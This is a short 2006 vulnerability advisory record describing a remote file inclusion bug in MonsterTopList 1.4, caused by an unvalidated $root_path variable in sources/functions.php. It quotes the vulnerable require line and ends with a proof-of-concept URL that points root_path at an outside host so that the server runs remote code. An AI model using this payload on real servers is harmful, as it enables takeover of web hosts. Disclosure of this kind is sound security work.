MonsterTopList- Remote Code Execution bug

2006-04-16T00:00:00
ID SECURITYVULNS:DOC:12246
Type securityvulns
Reporter Securityvulns
Modified 2006-04-16T00:00:00

Description

MonsterTopList- Remote Code Execution bug

discovered By: VietMafia

Developer site: http://www.monstertoplist.com/ Software: MTL 1.4 and prior Risk: Moderate Status: unpatched orginal advisory:http://pridels.blogspot.com/2006/04/monstertoplist.html

=================================

This flaw is due to an input validation error in the "sources/functions.php"(line 8) script that does not validate the "$root_path" variable,remote attackers can include malicious scripts and execute arbitrary commands with the privileges of the web server

code:file sources/functions.php

line 8: require $root_path . "sources/func_output.php";

demo:

http://www.monstertoplist.com/demo.html

POC Exploit http://[target]/[path]/sources/functions.php?root_path=http://unsecured-systems.com/forum/